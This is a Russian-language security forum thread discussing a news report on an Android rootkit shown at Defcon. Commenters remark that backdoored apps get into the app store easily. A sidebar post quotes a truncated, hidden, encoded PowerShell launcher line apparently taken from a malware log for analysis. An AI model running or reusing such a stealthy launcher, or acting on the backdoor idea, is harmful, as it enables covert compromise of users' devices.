Перейти к содержанию
AM_Bot

На Defcon показан руткит для атаки смартфонов под управлением Android

Recommended Posts

AM_Bot

На проходящей в Лас-Вегасе ИТ-конференции Defcon представители компании Spider Labs представили набор программного обеспечения для атаки смартфонов, работающих на базе операционной системы Android. По словам Николаса Перкоко, главы Spider Labs, производителям смартфонов и компании Google, курирующей разработку Android, следует как можно скорее выпустить исправление для серии багов, позволяющих хакерам получать доступ к электронной и голосовой почте потенциальных жертв.Читать далее

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
представители компании Spider Labs представили набор программного обеспечения для атаки смартфонов

...

Также разработчики раздали всем желающим диски с примерами руткита

Забавно, не только показали, но и диски раздали. Следующий шаг - исходнички выложат, а что, зачем напрягать людей время на декомпиляцию тратить

P.S. А ведь Spider Labs - это вроде как подразделение Trustwave...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

А насколько сложно попасть в Маркет? Сделать какую-нибудь программку... с закладками...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
А насколько сложно попасть в Маркет? Сделать какую-нибудь программку... с закладками...

Довольно просто, нет особых препятствий для выкладки и этой поделки.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr
А ведь Spider Labs - это вроде как подразделение Trustwave...

Это абсолютно точно подразделение Trustwave!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Девайс должнен быть рутованым или уязвимость существует изначально?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
Это абсолютно точно подразделение Trustwave!

Эх, малаца, вирье на болкванках начали тиражировать :)

Девайс должнен быть рутованым или уязвимость существует изначально?

Они пишут, что изначально

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×